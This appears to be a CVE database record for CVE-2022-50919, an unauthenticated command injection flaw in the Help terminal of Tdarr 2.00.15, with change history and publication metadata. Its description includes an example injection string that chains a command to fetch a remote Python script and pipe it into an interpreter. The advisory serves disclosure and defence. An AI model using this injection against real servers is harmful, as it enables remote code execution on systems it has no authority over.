Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
Metrics
Affected Vendors & Products
References
History
Wed, 14 Jan 2026 11:15:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| First Time appeared |
Tdarr
Tdarr tdarr |
|
| Vendors & Products |
Tdarr
Tdarr tdarr |
Tue, 13 Jan 2026 23:00:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| Description | Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication. | |
| Title | Tdarr 2.00.15 - Command Injection | |
| Weaknesses | CWE-78 | |
| References |
| |
| Metrics |
cvssV3_1
|
Status: PUBLISHED
Assigner: VulnCheck
Published: 2026-01-13T22:51:54.173Z
Updated: 2026-01-14T15:37:23.386Z
Reserved: 2026-01-11T13:14:18.877Z
Link: CVE-2022-50919
No data.
Status : Received
Published: 2026-01-13T23:15:55.597
Modified: 2026-01-13T23:15:55.597
Link: CVE-2022-50919
No data.